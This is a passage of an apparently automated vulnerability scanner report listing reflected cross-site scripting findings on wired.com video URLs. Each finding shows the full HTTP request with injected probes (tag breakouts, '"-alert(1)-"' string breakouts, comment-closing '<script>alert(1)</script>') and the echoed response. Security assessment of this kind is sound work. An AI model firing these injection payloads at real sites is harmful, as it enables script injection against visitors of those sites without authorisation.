Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29460
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:36 GMT
Date: Mon, 22 Nov 2010 00:39:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001
-->
...[SNIP]...

1.1029. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7799c"><a>3f7467ea934 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos7799c"><a>3f7467ea934/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:44:25 GMT
Date: Mon, 22 Nov 2010 00:39:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos7799c"><a>3f7467ea934 c_latest">
...[SNIP]...

1.1030. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff824"-alert(1)-"f06fa475ad8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosff824"-alert(1)-"f06fa475ad8/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:46:10 GMT
Date: Mon, 22 Nov 2010 00:41:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660653911001","latest","a-walle-for-roadside-bombs","1815816633","latest-videosff824"-alert(1)-"f06fa475ad8","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1031. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 533c5"-alert(1)-"4bb8706c87e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest533c5"-alert(1)-"4bb8706c87e/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:47:22 GMT
Date: Mon, 22 Nov 2010 00:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660653911001","latest-videos","a-walle-for-roadside-bombs","1815816633","latest533c5"-alert(1)-"4bb8706c87e","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1032. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee85a"><a>e2676fa6cb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestee85a"><a>e2676fa6cb5/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:46:25 GMT
Date: Mon, 22 Nov 2010 00:41:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestee85a"><a>e2676fa6cb5">
...[SNIP]...

1.1033. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 528de"-alert(1)-"2cc92763f9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633528de"-alert(1)-"2cc92763f9f/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:46 GMT
Date: Mon, 22 Nov 2010 00:42:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660653911001","latest-videos","latest","a-walle-for-roadside-bombs","1815816633528de"-alert(1)-"2cc92763f9f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1034. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc05"-alert(1)-"808e58c0512 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombscfc05"-alert(1)-"808e58c0512/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:47:45 GMT
Date: Mon, 22 Nov 2010 00:43:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660653911001","latest-videos","latest","a-walle-for-roadside-bombscfc05"-alert(1)-"808e58c0512","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1035. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94a45"-alert(1)-"0b8e91ffbd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/66065391100194a45"-alert(1)-"0b8e91ffbd8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:47:51 GMT
Date: Mon, 22 Nov 2010 00:43:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","a-walle-for-roadside-bombs","1815816633","66065391100194a45"-alert(1)-"0b8e91ffbd8","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1036. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1feae"><a>906cb8c65f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video1feae"><a>906cb8c65f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29437
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:40 GMT
Date: Mon, 22 Nov 2010 00:40:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video1feae"><a>906cb8c65f ss_latest-videos c_latest">
...[SNIP]...

1.1037. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71840--><script>alert(1)</script>ad628cf891f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29478
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:56 GMT
Date: Mon, 22 Nov 2010 00:41:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001
-->
...[SNIP]...

1.1038. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bfd"><a>253750acaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos67bfd"><a>253750acaf/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:57 GMT
Date: Mon, 22 Nov 2010 00:41:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos67bfd"><a>253750acaf c_latest">
...[SNIP]...

1.1039. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55513"-alert(1)-"bef2343d7bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos55513"-alert(1)-"bef2343d7bd/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:43 GMT
Date: Mon, 22 Nov 2010 00:42:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","latest-videos55513"-alert(1)-"bef2343d7bd","653293411001","back-to-the-future-physics-the-river-of-time","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1040. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603f0"><a>2b228d8fd46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest603f0"><a>2b228d8fd46/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:47:35 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest603f0"><a>2b228d8fd46">
...[SNIP]...

1.1041. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b9e0"-alert(1)-"7ee84ee8e21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest8b9e0"-alert(1)-"7ee84ee8e21/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:48:43 GMT
Date: Mon, 22 Nov 2010 00:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ipt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1815816633","653293411001","back-to-the-future-physics-the-river-of-time","latest8b9e0"-alert(1)-"7ee84ee8e21","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

